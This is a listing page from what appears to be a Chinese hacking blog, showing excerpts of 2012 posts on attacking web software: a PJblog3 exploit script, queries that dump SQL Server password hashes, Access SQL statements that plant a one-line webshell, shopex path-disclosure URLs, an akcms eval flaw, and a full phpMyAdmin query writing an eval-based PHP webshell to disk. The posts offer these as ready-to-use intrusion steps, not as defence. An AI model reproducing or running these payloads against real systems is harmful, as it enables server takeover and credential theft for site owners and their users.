御剑后台扫描工具 珍藏版

分类:工具 | 2012-11-21 | 撸过 3,498 次
2人扯谈

 

本地:御剑后台扫描工具 珍藏版

网盘:御剑后台扫描工具 珍藏版

利用QQ拼音纯净版漏洞可提权 Windows 8

分类:安全 | 2012-11-21 | 撸过 1,102 次
2人扯谈

    发现这个漏洞的时候, 笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。没想到就随手扫描到一台WIN8的系统,而且这个系统还装了QQ输入法WIN8纯净版。

    当时我就想起初中时候的那个极品五笔的漏洞,就随手测试了一下,没想到在时隔7、8年后的今天,号称非常安全的WIN8系统居然还有如此大的漏洞。这边就把提权过程理一遍。
[......]

继续阅读

PJblog3漏洞利用说明

分类:安全 | 2012-11-9 | 撸过 1,252 次
0人扯谈

真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞  伸直更可怕的注册会员直插一句话

工具是用VBS写的,代码如下:

If WScript.Arguments.Count <> 2 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs https://www.webshell.cc puterjam"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
a[......]

继续阅读

各种类型数据库抓HASH破解最高权限密码!

分类:安全 | 2012-11-5 | 撸过 2,369 次
0人扯谈

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa'

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C[......]

继续阅读

微信爆出漏洞!马化腾微信被盗!

分类:新闻 | 2012-10-21 | 撸过 3,806 次
3人扯谈

    在前不久,有极客网友根据电话采访周鸿祎的视频拨号声,分析出了周鸿祎的电话号码。此事一经报道,立刻在社会中传播开来。极客探究和不留后患的做法甚至得到了社会各界的广泛认可。周鸿祎得知后亲自抛出了橄榄枝。19日下午,有网友向本网提供消息,在WooYun 论坛又有一位极具实力的极客(黑客),他通过利用微信账号安全的设置漏洞,成功地破解了多为名人的微信账号,并公布为证。

目前该极客已经成功破解了柳岩、马化腾的微信账号。不知他会不会得到马化腾的垂青呢?漏洞及破解具体过程如下:

今天发现个微信群发的漏洞。还没玩。就被修补了。

于是就有了这个漏洞的产生。

同样问题产生在重置用户密码的环节。[......]

继续阅读

ACCESS执行SQL语句导出一句话拿webshell

分类:安全 | 2012-10-12 | 撸过 2,217 次
1人扯谈

实用环境,在access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

 
第三句代码

select * into [a] i[......]

继续阅读

学会使用这些工具,你就是合格的新手!

分类:安全 | 2012-10-12 | 撸过 5,512 次
4人扯谈

SQL Injection:
啊D            算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手
明小子       比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的
NBSI        这个软件对于SQL server的注入有极高的准确率
Pangolin  俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多种数据库都能注入
Havij       国外的注入软件,比穿山甲好点,但是是英文的,也支持各种平台

Web Scanner[......]

继续阅读

akcms 代码执行漏洞

分类:安全 | 2012-10-8 | 撸过 1,283 次
1人扯谈

    上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。

0x01、原理分析

漏洞问题主要存在于include\common.func.php文件中的ak_if函数,先看下代码

akcms 代码执行漏洞

eval函数参数中的变量$variable未作任何的处理变插入到了函数中。ak_if这个函数的主要用途是,提供给建站用户一个简单的逻辑判断功能的接口。对比一下4.1版本中的这段代码

akcms 代码执行漏洞

可以发现,相差了eval函数调用的语句。在4.1.[......]

继续阅读

shopex前台普通用户getshell最新漏洞

分类:安全 | 2012-10-8 | 撸过 957 次
0人扯谈

第一个:想办法找到目标网站的绝对路径

http://www.webshell.cc/install/svinfo.php?phpinfo=true
https://www.webshell.cc/core/api/shop_api.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_goodstype.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0[......]

继续阅读

phpmyadmin 导出 shell 至中文路径

分类:安全 | 2012-09-27 | 撸过 5,177 次
0人扯谈
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\网站\mm.php';
第 10 页,共 70 页« 最新...89101112...203040...最旧 »